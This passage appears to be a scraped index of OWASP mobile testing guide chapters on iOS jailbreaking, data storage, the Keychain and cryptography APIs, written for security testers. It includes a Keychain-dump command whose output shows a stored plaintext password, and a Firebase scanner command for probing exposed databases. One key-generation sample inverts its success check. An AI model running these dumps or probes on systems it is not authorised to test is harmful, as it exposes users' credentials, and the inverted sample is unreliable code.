Developing a jailbreak for a given version of iOS is not easy. As a security tester, you'll most likely want to use publicly available jailbreak tools. Still, we recommend studying the techniques that have been used to jailbreak various versions of iOS-you'll encounter many interesting exploits and learn a lot about OS internals. For example, Pangu9 for iOS 9.x exploited at least five vulnerabilities, including a use-after-free kernel bug (CVE-2015-6794) and an arbitrary file system access vulnerability in the Photos app (CVE-2015-7037).
Some apps attempt to detect whether the iOS device on which they're running is jailbroken. This is because jailbreaking deactivates some of iOS' default security mechanisms. However, there are several ways to get around these detections, and we'll introduce them in the chapter \"iOS Anti-Reversing Defenses\".
"},{"location":"MASTG/iOS/0x06b-iOS-Security-Testing/#benefits-of-jailbreaking","title":"Benefits of Jailbreaking","text":"End users often jailbreak their devices to tweak the iOS system's appearance, add new features, and install third-party apps from unofficial app stores. For a security tester, however, jailbreaking an iOS device has even more benefits. They include, but aren't limited to, the following:
There are tethered, semi-tethered, semi-untethered, and untethered jailbreaks.
Tethered jailbreaks don't persist through reboots, so re-applying jailbreaks requires the device to be connected (tethered) to a computer during every reboot. The device may not reboot at all if the computer is not connected.
Semi-tethered jailbreaks can't be re-applied unless the device is connected to a computer during reboot. The device can also boot into non-jailbroken mode on its own.
Semi-untethered jailbreaks allow the device to boot on its own, but the kernel patches (or user-land modifications) for disabling code signing aren't applied automatically. The user must re-jailbreak the device by starting an app or visiting a website (not requiring a connection to a computer, hence the term untethered).
Untethered jailbreaks are the most popular choice for end users because they need to be applied only once, after which the device will be permanently jailbroken.
Developing a jailbreak for iOS is becoming more and more complicated as Apple continues to harden their OS. Whenever Apple becomes aware of a vulnerability, it is patched and a system update is pushed out to all users. As it is not possible to downgrade to a specific version of iOS, and since Apple only allows you to update to the latest iOS version, it is a challenge to have a device which is running a version of iOS for which a jailbreak is available. Some vulnerabilities cannot be patched by software, such as the checkm8 exploit affecting the BootROM of all CPUs until A12.
If you have a jailbroken device that you use for security testing, keep it as is unless you're 100% sure that you can re-jailbreak it after upgrading to the latest iOS version. Consider getting one (or multiple) spare device(s) (which will be updated with every major iOS release) and waiting for a jailbreak to be released publicly. Apple is usually quick to release a patch once a jailbreak has been released publicly, so you only have a couple of days to downgrade (if it is still signed by Apple) to the affected iOS version and apply the jailbreak.
iOS upgrades are based on a challenge-response process (generating the so-called SHSH blobs as a result). The device will allow the OS installation only if the response to the challenge is signed by Apple. This is what researchers call a \"signing window\", and it is the reason you can't simply store the OTA firmware package you downloaded and load it onto the device whenever you want to. During minor iOS upgrades, two versions may both be signed by Apple (the latest one, and the previous iOS version). This is the only situation in which you can downgrade the iOS device. You can check the current signing window and download OTA firmware from the IPSW Downloads website.
For some devices and iOS versions, it is possible to downgrade to older versions in case the SHSH blobs for that device were collected when the signing window was active. More information on this can be found on the cfw iOS Guide - Saving Blobs
"},{"location":"MASTG/iOS/0x06b-iOS-Security-Testing/#which-jailbreaking-tool-to-use","title":"Which Jailbreaking Tool to Use","text":"Different iOS versions require different jailbreaking techniques. Determine whether a public jailbreak is available for your version of iOS. Beware of fake tools and spyware, which are often hiding behind domain names that are similar to the name of the jailbreaking group/author.
The iOS jailbreak scene evolves so rapidly that providing up-to-date instructions is difficult. However, we can point you to some sources that are currently reliable.
Note that any modification you make to your device is at your own risk. While jailbreaking is typically safe, things can go wrong and you may end up bricking your device. No other party except yourself can be held accountable for any damage.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/","title":"iOS Data Storage","text":""},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#overview","title":"Overview","text":"The protection of sensitive data, such as authentication tokens and private information, is key for mobile security. In this chapter, you'll learn about the iOS APIs for local data storage, and best practices for using them.
As little sensitive data as possible should be saved in permanent local storage. However, in most practical scenarios, at least some user data must be stored. Fortunately, iOS offers secure storage APIs, which allow developers to use the cryptographic hardware available on every iOS device. If these APIs are used correctly, sensitive data and files can be secured via hardware-backed 256-bit AES encryption.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#nsdata-and-nsmutabledata","title":"NSData and NSMutableData","text":"NSData
(static data objects) and NSMutableData
(dynamic data objects) are typically used for data storage, but they are also useful for distributed objects applications, in which data contained in data objects can be copied or moved between applications. The following are methods used to write NSData
objects:
NSDataWritingWithoutOverwriting
NSDataWritingFileProtectionNone
NSDataWritingFileProtectionComplete
NSDataWritingFileProtectionCompleteUnlessOpen
NSDataWritingFileProtectionCompleteUntilFirstUserAuthentication
writeToFile
: stores data as part of the NSData
classNSSearchPathForDirectoriesInDomains, NSTemporaryDirectory
: used to manage file pathsNSFileManager
: lets you examine and change the contents of the file system. You can use createFileAtPath
to create a file and write to it.The following example shows how to create a complete
encrypted file using the FileManager
class. You can find more information in the Apple Developer Documentation \"Encrypting Your App's Files\"
Swift:
FileManager.default.createFile(\n atPath: filePath,\n contents: \"secret text\".data(using: .utf8),\n attributes: [FileAttributeKey.protectionKey: FileProtectionType.complete]\n)\n
Objective-C:
[[NSFileManager defaultManager] createFileAtPath:[self filePath]\n contents:[@\"secret text\" dataUsingEncoding:NSUTF8StringEncoding]\n attributes:[NSDictionary dictionaryWithObject:NSFileProtectionComplete\n forKey:NSFileProtectionKey]];\n
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#nsuserdefaults","title":"NSUserDefaults","text":"The NSUserDefaults
class provides a programmatic interface for interacting with the default system. The default system allows an application to customize its behavior according to user preferences. Data saved by NSUserDefaults
can be viewed in the application bundle. This class stores data in a plist file, but it's meant to be used with small amounts of data.
Core Data
is a framework for managing the model layer of objects in your application. It provides general and automated solutions to common tasks associated with object life cycles and object graph management, including persistence. Core Data can use SQLite as its persistent store, but the framework itself is not a database.
CoreData does not encrypt its data by default. As part of a research project (iMAS) from the MITRE Corporation that was focused on open source iOS security controls, an additional encryption layer can be added to CoreData. See the GitHub Repo for more details.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#sqlite-databases","title":"SQLite Databases","text":"The SQLite 3 library must be added to an app if the app is to use SQLite. This library is a C++ wrapper that provides an API for the SQLite commands.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#firebase-real-time-databases","title":"Firebase Real-time Databases","text":"Firebase is a development platform with more than 15 products, and one of them is Firebase Real-time Database. It can be leveraged by application developers to store and sync data with a NoSQL cloud-hosted database. The data is stored as JSON and is synchronized in real-time to every connected client and also remains available even when the application goes offline.
A misconfigured Firebase instance can be identified by making the following network call:
https://\\<firebaseProjectName\\>.firebaseio.com/.json
The firebaseProjectName can be retrieved from the property list(.plist) file. For example, PROJECT_ID
key stores the corresponding Firebase project name in GoogleService-Info.plist file.
Alternatively, the analysts can use Firebase Scanner, a python script that automates the task above as shown below:
python FirebaseScanner.py -f <commaSeparatedFirebaseProjectNames>\n
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#realm-databases","title":"Realm Databases","text":"Realm Objective-C and Realm Swift aren't supplied by Apple, but they are still worth noting. They store everything unencrypted, unless the configuration has encryption enabled.
The following example demonstrates how to use encryption with a Realm database:
// Open the encrypted Realm file where getKey() is a method to obtain a key from the Keychain or a server\nlet config = Realm.Configuration(encryptionKey: getKey())\ndo {\n let realm = try Realm(configuration: config)\n // Use the Realm as normal\n} catch let error as NSError {\n // If the encryption key is wrong, `error` will say that it's an invalid database\n fatalError(\"Error opening realm: \\(error)\")\n}\n
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#couchbase-lite-databases","title":"Couchbase Lite Databases","text":"Couchbase Lite is a lightweight, embedded, document-oriented (NoSQL) database engine that can be synced. It compiles natively for iOS and macOS.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#yapdatabase","title":"YapDatabase","text":"YapDatabase is a key/value store built on top of SQLite.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#user-interface","title":"User Interface","text":""},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#ui-components","title":"UI Components","text":"Entering sensitive information when, for example, registering an account or making payments, is an essential part of using many apps. This data may be financial information such as credit card data or user account passwords. The data may be exposed if the app doesn't properly mask it while it is being typed.
In order to prevent disclosure and mitigate risks such as shoulder surfing you should verify that no sensitive data is exposed via the user interface unless explicitly required (e.g. a password being entered). For the data required to be present it should be properly masked, typically by showing asterisks or dots instead of clear text.
Carefully review all UI components that either show such information or take it as input. Search for any traces of sensitive information and evaluate if it should be masked or completely removed.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#screenshots","title":"Screenshots","text":"Manufacturers want to provide device users with an aesthetically pleasing effect when an application is started or exited, so they introduced the concept of saving a screenshot when the application goes into the background. This feature can pose a security risk because screenshots (which may display sensitive information such as an email or corporate documents) are written to local storage, where they can be recovered by a rogue application with a sandbox bypass exploit or someone who steals the device.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#keyboard-cache","title":"Keyboard Cache","text":"Several options, such as autocorrect and spell check, are available to users to simplify keyboard input and are cached by default in .dat
files in /private/var/mobile/Library/Keyboard/
and its subdirectories.
The UITextInputTraits protocol is used for keyboard caching. The UITextField
, UITextView
, and UISearchBar
classes automatically support this protocol and it offers the following properties:
var autocorrectionType: UITextAutocorrectionType
determines whether autocorrection is enabled during typing. When autocorrection is enabled, the text object tracks unknown words and suggests suitable replacements, replacing the typed text automatically unless the user overrides the replacement. The default value of this property is UITextAutocorrectionTypeDefault
, which for most input methods enables autocorrection.var secureTextEntry: BOOL
determines whether text copying and text caching are disabled and hides the text being entered for UITextField
. The default value of this property is NO
.App developers can leverage the iOS Data Protection APIs to implement fine-grained access control for user data stored in flash memory. The APIs are built on top of the Secure Enclave Processor (SEP), which was introduced with the iPhone 5S. The SEP is a coprocessor that provides cryptographic operations for data protection and key management. A device-specific hardware key-the device UID (Unique ID)-is embedded in the secure enclave, ensuring the integrity of data protection even when the operating system kernel is compromised.
You can learn more about the Secure Enclave in this BlackHat presentation \"Demystifying the Secure Enclave Processor\" by Tarjei Mandt, Mathew Solnik and David Wang.
The data protection architecture is based on a hierarchy of keys. The UID and the user passcode key (which is derived from the user's passphrase via the PBKDF2 algorithm) sit at the top of this hierarchy. Together, they can be used to \"unlock\" so-called class keys, which are associated with different device states (e.g., device locked/unlocked).
Every file stored on the iOS file system is encrypted with its own per-file key, which is contained in the file metadata. The metadata is encrypted with the file system key and wrapped with the class key corresponding to the protection class the app selected when creating the file.
The following illustration shows the iOS Data Protection Key Hierarchy.
Files can be assigned to one of four different protection classes, which are explained in more detail in the iOS Security Guide:
Complete Protection (NSFileProtectionComplete): A key derived from the user passcode and the device UID protects this class key. The derived key is wiped from memory shortly after the device is locked, making the data inaccessible until the user unlocks the device.
Protected Unless Open (NSFileProtectionCompleteUnlessOpen): This protection class is similar to Complete Protection, but, if the file is opened when unlocked, the app can continue to access the file even if the user locks the device. This protection class is used when, for example, a mail attachment is downloading in the background.
Protected Until First User Authentication (NSFileProtectionCompleteUntilFirstUserAuthentication): The file can be accessed as soon as the user unlocks the device for the first time after booting. It can be accessed even if the user subsequently locks the device and the class key is not removed from memory.
No Protection (NSFileProtectionNone): The key for this protection class is protected with the UID only. The class key is stored in \"Effaceable Storage\", which is a region of flash memory on the iOS device that allows the storage of small amounts of data. This protection class exists for fast remote wiping (immediate deletion of the class key, which makes the data inaccessible).
All class keys except NSFileProtectionNone
are encrypted with a key derived from the device UID and the user's passcode. As a result, decryption can happen only on the device itself and requires the correct passcode.
Since iOS 7, the default data protection class is \"Protected Until First User Authentication\".
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#external-storage","title":"External Storage","text":""},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#the-keychain","title":"The Keychain","text":"The iOS Keychain can be used to securely store short, sensitive bits of data, such as encryption keys and session tokens. It is implemented as an SQLite database that can be accessed through the Keychain APIs only.
On macOS, every user application can create as many Keychains as desired, and every login account has its own Keychain. The structure of the Keychain on iOS is different: only one Keychain is available to all apps. Access to the items can be shared between apps signed by the same developer via the access groups feature of the attribute kSecAttrAccessGroup
. Access to the Keychain is managed by the securityd
daemon, which grants access according to the app's Keychain-access-groups
, application-identifier
, and application-group
entitlements.
The Keychain API includes the following main operations:
SecItemAdd
SecItemUpdate
SecItemCopyMatching
SecItemDelete
Data stored in the Keychain is protected via a class structure that is similar to the class structure used for file encryption. Items added to the Keychain are encoded as a binary plist and encrypted with a 128-bit AES per-item key in Galois/Counter Mode (GCM). Note that larger blobs of data aren't meant to be saved directly in the Keychain-that's what the Data Protection API is for. You can configure data protection for Keychain items by setting the kSecAttrAccessible
key in the call to SecItemAdd
or SecItemUpdate
. The following configurable accessibility values for kSecAttrAccessible are the Keychain Data Protection classes:
kSecAttrAccessibleAlways
: The data in the Keychain item can always be accessed, regardless of whether the device is locked.kSecAttrAccessibleAlwaysThisDeviceOnly
: The data in the Keychain item can always be accessed, regardless of whether the device is locked. The data won't be included in an iCloud or local backup.kSecAttrAccessibleAfterFirstUnlock
: The data in the Keychain item can't be accessed after a restart until the device has been unlocked once by the user.kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly
: The data in the Keychain item can't be accessed after a restart until the device has been unlocked once by the user. Items with this attribute do not migrate to a new device. Thus, after restoring from a backup of a different device, these items will not be present.kSecAttrAccessibleWhenUnlocked
: The data in the Keychain item can be accessed only while the device is unlocked by the user.kSecAttrAccessibleWhenUnlockedThisDeviceOnly
: The data in the Keychain item can be accessed only while the device is unlocked by the user. The data won't be included in an iCloud or local backup.kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly
: The data in the Keychain can be accessed only when the device is unlocked. This protection class is only available if a passcode is set on the device. The data won't be included in an iCloud or local backup.AccessControlFlags
define the mechanisms with which users can authenticate the key (SecAccessControlCreateFlags
):
kSecAccessControlDevicePasscode
: Access the item via a passcode.kSecAccessControlBiometryAny
: Access the item via one of the fingerprints registered to Touch ID. Adding or removing a fingerprint won't invalidate the item.kSecAccessControlBiometryCurrentSet
: Access the item via one of the fingerprints registered to Touch ID. Adding or removing a fingerprint will invalidate the item.kSecAccessControlUserPresence
: Access the item via either one of the registered fingerprints (using Touch ID) or default to the passcode.Please note that keys secured by Touch ID (via kSecAccessControlBiometryAny
or kSecAccessControlBiometryCurrentSet
) are protected by the Secure Enclave: The Keychain holds a token only, not the actual key. The key resides in the Secure Enclave.
Starting with iOS 9, you can do ECC-based signing operations in the Secure Enclave. In that scenario, the private key and the cryptographic operations reside within the Secure Enclave. See the static analysis section for more info on creating the ECC keys. iOS 9 supports only 256-bit ECC. Furthermore, you need to store the public key in the Keychain because it can't be stored in the Secure Enclave. After the key is created, you can use the kSecAttrKeyType
to indicate the type of algorithm you want to use the key with.
In case you want to use these mechanisms, it is recommended to test whether the passcode has been set. In iOS 8, you will need to check whether you can read/write from an item in the Keychain protected by the kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly
attribute. From iOS 9 onward you can check whether a lock screen is set, using LAContext
:
Swift:
public func devicePasscodeEnabled() -> Bool {\n return LAContext().canEvaluatePolicy(.deviceOwnerAuthentication, error: nil)\n}\n
Objective-C:
-(BOOL)devicePasscodeEnabled:(LAContext)context{\n if ([context canEvaluatePolicy:LAPolicyDeviceOwnerAuthentication error:nil]) {\n return true;\n } else {\n return false;\n }\n}\n
Here is sample Swift code you can use to create keys (Notice the kSecAttrTokenID as String: kSecAttrTokenIDSecureEnclave
: this indicates that we want to use the Secure Enclave directly.):
// private key parameters\nlet privateKeyParams = [\n kSecAttrLabel as String: \"privateLabel\",\n kSecAttrIsPermanent as String: true,\n kSecAttrApplicationTag as String: \"applicationTag\",\n] as CFDictionary\n\n// public key parameters\nlet publicKeyParams = [\n kSecAttrLabel as String: \"publicLabel\",\n kSecAttrIsPermanent as String: false,\n kSecAttrApplicationTag as String: \"applicationTag\",\n] as CFDictionary\n\n// global parameters\nlet parameters = [\n kSecAttrKeyType as String: kSecAttrKeyTypeEC,\n kSecAttrKeySizeInBits as String: 256,\n kSecAttrTokenID as String: kSecAttrTokenIDSecureEnclave,\n kSecPublicKeyAttrs as String: publicKeyParams,\n kSecPrivateKeyAttrs as String: privateKeyParams,\n] as CFDictionary\n\nvar pubKey, privKey: SecKey?\nlet status = SecKeyGeneratePair(parameters, &pubKey, &privKey)\n\nif status != errSecSuccess {\n // Keys created successfully\n}\n
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#keychain-data-persistence","title":"Keychain Data Persistence","text":"On iOS, when an application is uninstalled, the Keychain data used by the application is retained by the device, unlike the data stored by the application sandbox which is wiped. In the event that a user sells their device without performing a factory reset, the buyer of the device may be able to gain access to the previous user's application accounts and data by reinstalling the same applications used by the previous user. This would require no technical ability to perform.
When assessing an iOS application, you should look for Keychain data persistence. This is normally done by using the application to generate sample data that may be stored in the Keychain, uninstalling the application, then reinstalling the application to see whether the data was retained between application installations. Use objection runtime mobile exploration toolkit to dump the keychain data. The following objection
command demonstrates this procedure:
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios keychain dump\nNote: You may be asked to authenticate using the devices passcode or TouchID\nSave the output by adding `--json keychain.json` to this command\nDumping the iOS keychain...\nCreated Accessible ACL Type Account Service Data\n------------------------- ------------------------------ ----- -------- ------------------------- ------------------------------------------------------------- ------------------------------------\n2020-02-11 13:26:52 +0000 WhenUnlocked None Password keychainValue com.highaltitudehacks.DVIAswiftv2.develop mysecretpass123\n
There's no iOS API that developers can use to force wipe data when an application is uninstalled. Instead, developers should take the following steps to prevent Keychain data from persisting between application installations:
let userDefaults = UserDefaults.standard\n\nif userDefaults.bool(forKey: \"hasRunBefore\") == false {\n // Remove Keychain items here\n\n // Update the flag indicator\n userDefaults.set(true, forKey: \"hasRunBefore\")\n}\n
There are many legitimate reasons for creating log files on a mobile device, including keeping track of crashes or errors that are stored locally while the device is offline (so that they can be sent to the app's developer once online), and storing usage statistics. However, logging sensitive data, such as credit card numbers and session information, may expose the data to attackers or malicious applications. Log files can be created in several ways. The following list shows the methods available on iOS:
iOS includes auto-backup features that create copies of the data stored on the device. You can make iOS backups from your host computer by using iTunes (till macOS Catalina) or Finder (from macOS Catalina onwards), or via the iCloud backup feature. In both cases, the backup includes nearly all data stored on the iOS device except highly sensitive data such as Apple Pay information and Touch ID settings.
Since iOS backs up installed apps and their data, an obvious concern is whether sensitive user data stored by the app might unintentionally leak through the backup. Another concern, though less obvious, is whether sensitive configuration settings used to protect data or restrict app functionality could be tampered to change app behavior after restoring a modified backup. Both concerns are valid and these vulnerabilities have proven to exist in a vast number of apps today.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#how-the-keychain-is-backed-up","title":"How the Keychain Is Backed Up","text":"When users back up their iOS device, the Keychain data is backed up as well, but the secrets in the Keychain remain encrypted. The class keys necessary to decrypt the Keychain data aren't included in the backup. Restoring the Keychain data requires restoring the backup to a device and unlocking the device with the user's passcode.
Keychain items for which the kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly
attribute is set can be decrypted only if the backup is restored to the backed up device. Someone trying to extract this Keychain data from the backup couldn't decrypt it without access to the crypto hardware inside the originating device.
One caveat to using the Keychain, however, is that it was only designed to store small bits of user data or short notes (according to Apple's documentation on Keychain Services). This means that apps with larger local secure storage needs (e.g., messaging apps, etc.) should encrypt the data within the app container, but use the Keychain to store key material. In cases where sensitive configuration settings (e.g., data loss prevention policies, password policies, compliance policies, etc) must remain unencrypted within the app container, you can consider storing a hash of the policies in the keychain for integrity checking. Without an integrity check, these settings could be modified within a backup and then restored back to the device to modify app behavior (e.g., change configured remote endpoints) or security settings (e.g., jailbreak detection, certificate pinning, maximum UI login attempts, etc.).
The takeaway: If sensitive data is handled as recommended earlier in this chapter (e.g., stored in the Keychain, with Keychain-backed integrity checks, or encrypted with a key that's locked inside the Keychain), backups shouldn't be a security issue.
"},{"location":"MASTG/iOS/0x06d-Testing-Data-Storage/#process-memory","title":"Process Memory","text":"Analyzing memory can help developers to identify the root causes of problems such as application crashes. However, it can also be used to access sensitive data. This section describes how to check a process's memory for data disclosure.
First, identify the sensitive information that's stored in memory. Sensitive assets are very likely to be loaded into memory at some point. The objective is to make sure that this info is exposed as briefly as possible.
To investigate an application's memory, first create a memory dump. Alternatively, you can analyze the memory in real time with, for example, a debugger. Regardless of the method you use, this is a very error-prone process because dumps provide the data left by executed functions and you might miss executing critical steps. In addition, overlooking data during analysis is quite easy to do unless you know the footprint of the data you're looking for (either its exact value or its format). For example, if the app encrypts according to a randomly generated symmetric key, you're very unlikely to spot the key in memory unless you find its value by other means.
Before looking into the source code, checking the documentation and identifying application components provide an overview of where data might be exposed. For example, while sensitive data received from a backend exists in the final model object, multiple copies may also exist in the HTTP client or the XML parser. All these copies should be removed from memory as soon as possible.
Understanding the application's architecture and its interaction with the OS will help you identify sensitive information that doesn't have to be exposed in memory at all. For example, assume your app receives data from one server and transfers it to another without needing any additional processing. That data can be received and handled in encrypted form, which prevents exposure via memory.
However, if sensitive data does need to be exposed via memory, make sure that your app exposes as few copies of this data as possible for as little time as possible. In other words, you want centralized handling of sensitive data, based on primitive and mutable data structures.
Such data structures give developers direct access to memory. Make sure that this access is used to overwrite the sensitive data and cryptographic keys with zeroes. Apple Secure Coding Guide suggests zeroing sensitive data after usage, but provides no recommended ways of doing this.
Examples of preferable data types include char []
and int []
, but not NSString
or String
. Whenever you try to modify an immutable object, such as a String
, you actually create a copy and change the copy. Consider using NSMutableData
for storing secrets on Swift/Objective-C and use resetBytes(in:)
method for zeroing. Also, see Clean memory of secret data for reference.
Avoid Swift data types other than collections regardless of whether they are considered mutable. Many Swift data types hold their data by value, not by reference. Although this allows modification of the memory allocated to simple types like char
and int
, handling a complex type such as String
by value involves a hidden layer of objects, structures, or primitive arrays whose memory can't be directly accessed or modified. Certain types of usage may seem to create a mutable data object (and even be documented as doing so), but they actually create a mutable identifier (variable) instead of an immutable identifier (constant). For example, many think that the following results in a mutable String
in Swift, but this is actually an example of a variable whose complex value can be changed (replaced, not modified in place):
var str1 = \"Goodbye\" // \"Goodbye\", base address: 0x0001039e8dd0\nstr1.append(\" \") // \"Goodbye \", base address: 0x608000064ae0\nstr1.append(\"cruel world!\") // \"Goodbye cruel world\", base address: 0x6080000338a0\nstr1.removeAll() // \"\", base address 0x00010bd66180\n
Notice that the base address of the underlying value changes with each string operation. Here is the problem: To securely erase the sensitive information from memory, we don't want to simply change the value of the variable; we want to change the actual content of the memory allocated for the current value. Swift doesn't offer such a function.
Swift collections (Array
, Set
, and Dictionary
), on the other hand, may be acceptable if they collect primitive data types such as char
or int
and are defined as mutable (i.e., as variables instead of constants), in which case they are more or less equivalent to a primitive array (such as char []
). These collections provide memory management, which can result in unidentified copies of the sensitive data in memory if the collection needs to copy the underlying buffer to a different location to extend it.
Using mutable Objective-C data types, such as NSMutableString
, may also be acceptable, but these types have the same memory issue as Swift collections. Pay attention when using Objective-C collections; they hold data by reference, and only Objective-C data types are allowed. Therefore, we are looking, not for a mutable collection, but for a collection that references mutable objects.
As we've seen so far, using Swift or Objective-C data types requires a deep understanding of the language implementation. Furthermore, there has been some core re-factoring in between major Swift versions, resulting in many data types' behavior being incompatible with that of other types. To avoid these issues, we recommend using primitive data types whenever data needs to be securely erased from memory.
Unfortunately, few libraries and frameworks are designed to allow sensitive data to be overwritten. Not even Apple considers this issue in the official iOS SDK API. For example, most of the APIs for data transformation (parsers, serializers, etc.) operate on non-primitive data types. Similarly, regardless of whether you flag some UITextField
as Secure Text Entry or not, it always returns data in the form of a String
or NSString
.
Inter Process Communication (IPC) allows processes to send each other messages and data. For processes that need to communicate with each other, there are different ways to implement IPC on iOS:
launchd
. It is the most secure and flexible implementation of IPC on iOS and should be the preferred method. It runs in the most restricted environment possible: sandboxed with no root privilege escalation and minimal file system access and network access. Two different APIs are used with XPC Services:NSFileCoordinator
can be used to manage and send data to and from apps via files that are available on the local file system to various processes. NSFileCoordinator methods run synchronously, so your code will be blocked until they stop executing. That's convenient because you don't have to wait for an asynchronous block callback, but it also means that the methods block the running thread.In the \"Mobile App Cryptography\" chapter, we introduced general cryptography best practices and described typical issues that can occur when cryptography is used incorrectly. In this chapter, we'll go into more detail on iOS's cryptography APIs. We'll show how to identify usage of those APIs in the source code and how to interpret cryptographic configurations. When reviewing code, make sure to compare the cryptographic parameters used with the current best practices linked from this guide.
Apple provides libraries that include implementations of most common cryptographic algorithms. Apple's Cryptographic Services Guide is a great reference. It contains generalized documentation of how to use standard libraries to initialize and use cryptographic primitives, information that is useful for source code analysis.
"},{"location":"MASTG/iOS/0x06e-Testing-Cryptography/#cryptokit","title":"CryptoKit","text":"Apple CryptoKit was released with iOS 13 and is built on top of Apple's native cryptographic library corecrypto which is FIPS 140-2 validated. The Swift framework provides a strongly typed API interface, has effective memory management, conforms to equatable, and supports generics. CryptoKit contains secure algorithms for hashing, symmetric-key cryptography, and public-key cryptography. The framework can also utilize the hardware based key manager from the Secure Enclave.
Apple CryptoKit contains the following algorithms:
Hashes:
Symmetric-Key:
Public-Key:
Examples:
Generating and releasing a symmetric key:
let encryptionKey = SymmetricKey(size: .bits256)\n
Calculating a SHA-2 512-bit digest:
let rawString = \"OWASP MTSG\"\nlet rawData = Data(rawString.utf8)\nlet hash = SHA512.hash(data: rawData) // Compute the digest\nlet textHash = String(describing: hash)\nprint(textHash) // Print hash text\n
For more information about Apple CryptoKit, please visit the following resources:
The most commonly used Class for cryptographic operations is the CommonCrypto, which is packed with the iOS runtime. The functionality offered by the CommonCrypto object can best be dissected by having a look at the source code of the header file:
Commoncryptor.h
gives the parameters for the symmetric cryptographic operations.CommonDigest.h
gives the parameters for the hashing Algorithms.CommonHMAC.h
gives the parameters for the supported HMAC operations.CommonKeyDerivation.h
gives the parameters for supported KDF functions.CommonSymmetricKeywrap.h
gives the function used for wrapping a symmetric key with a Key Encryption Key.Unfortunately, CommonCryptor lacks a few types of operations in its public APIs, such as: GCM mode is only available in its private APIs See its source code. For this, an additional binding header is necessary or other wrapper libraries can be used.
Next, for asymmetric operations, Apple provides SecKey. Apple provides a nice guide in its Developer Documentation on how to use this.
As noted before: some wrapper-libraries exist for both in order to provide convenience. Typical libraries that are used are, for instance:
There are various third party libraries available, such as:
There are various methods on how to store the key on the device. Not storing a key at all will ensure that no key material can be dumped. This can be achieved by using a Password Key Derivation function, such as PBKDF2. See the example below:
func pbkdf2SHA1(password: String, salt: Data, keyByteCount: Int, rounds: Int) -> Data? {\n return pbkdf2(hash: CCPBKDFAlgorithm(kCCPRFHmacAlgSHA1), password: password, salt: salt, keyByteCount: keyByteCount, rounds: rounds)\n}\n\nfunc pbkdf2SHA256(password: String, salt: Data, keyByteCount: Int, rounds: Int) -> Data? {\n return pbkdf2(hash: CCPBKDFAlgorithm(kCCPRFHmacAlgSHA256), password: password, salt: salt, keyByteCount: keyByteCount, rounds: rounds)\n}\n\nfunc pbkdf2SHA512(password: String, salt: Data, keyByteCount: Int, rounds: Int) -> Data? {\n return pbkdf2(hash: CCPBKDFAlgorithm(kCCPRFHmacAlgSHA512), password: password, salt: salt, keyByteCount: keyByteCount, rounds: rounds)\n}\n\nfunc pbkdf2(hash: CCPBKDFAlgorithm, password: String, salt: Data, keyByteCount: Int, rounds: Int) -> Data? {\n let passwordData = password.data(using: String.Encoding.utf8)!\n var derivedKeyData = Data(repeating: 0, count: keyByteCount)\n let derivedKeyDataLength = derivedKeyData.count\n let derivationStatus = derivedKeyData.withUnsafeMutableBytes { derivedKeyBytes in\n salt.withUnsafeBytes { saltBytes in\n\n CCKeyDerivationPBKDF(\n CCPBKDFAlgorithm(kCCPBKDF2),\n password, passwordData.count,\n saltBytes, salt.count,\n hash,\n UInt32(rounds),\n derivedKeyBytes, derivedKeyDataLength\n )\n }\n }\n if derivationStatus != 0 {\n // Error\n return nil\n }\n\n return derivedKeyData\n}\n\nfunc testKeyDerivation() {\n let password = \"password\"\n let salt = Data([0x73, 0x61, 0x6C, 0x74, 0x44, 0x61, 0x74, 0x61])\n let keyByteCount = 16\n let rounds = 100_000\n\n let derivedKey = pbkdf2SHA1(password: password, salt: salt, keyByteCount: keyByteCount, rounds: rounds)\n}\n
Arcane
libraryWhen you need to store the key, it is recommended to use the Keychain as long as the protection class chosen is not kSecAttrAccessibleAlways
. Storing keys in any other location, such as the NSUserDefaults
, property list files or by any other sink from Core Data or Realm, is usually less secure than using the KeyChain. Even when the sync of Core Data or Realm is protected by using NSFileProtectionComplete
data protection class, we still recommend using the KeyChain. See the chapter \"Data Storage on iOS\" for more details.
The KeyChain supports two types of storage mechanisms: a key is either secured by an encryption key stored in the secure enclave or the key itself is within the secure enclave. The latter only holds when you use an ECDH signing key. See the Apple Documentation for more details on its implementation.
The last three options consist of using hardcoded encryption keys in the source code, having a predictable key derivation function based on stable attributes, and storing generated keys in places that are shared with other applications. Using hardcoded encryption keys is obviously not the way to go, as this would mean that every instance of the application uses the same encryption key. An attacker needs only to do the work once in order to extract the key from the source code (whether stored natively or in Objective-C/Swift). Consequently, the attacker can decrypt any other data that was encrypted by the application. Next, when you have a predictable key derivation function based on identifiers which are accessible to other applications, the attacker only needs to find the KDF and apply it to the device in order to find the key. Lastly, storing symmetric encryption keys publicly also is highly discouraged.
Two more notions you should never forget when it comes to cryptography:
Apple provides a Randomization Services API, which generates cryptographically secure random numbers.
The Randomization Services API uses the SecRandomCopyBytes
function to generate numbers. This is a wrapper function for the /dev/random
device file, which provides cryptographically secure pseudorandom values from 0 to 255. Make sure that all random numbers are generated with this API. There is no reason for developers to use a different one.
During local authentication, an app authenticates the user against credentials stored locally on the device. In other words, the user \"unlocks\" the app or some inner layer of functionality by providing a valid PIN, password or biometric characteristics such as face or fingerprint, which is verified by referencing local data. Generally, this is done so that users can more conveniently resume an existing session with a remote service or as a means of step-up authentication to protect some critical function.
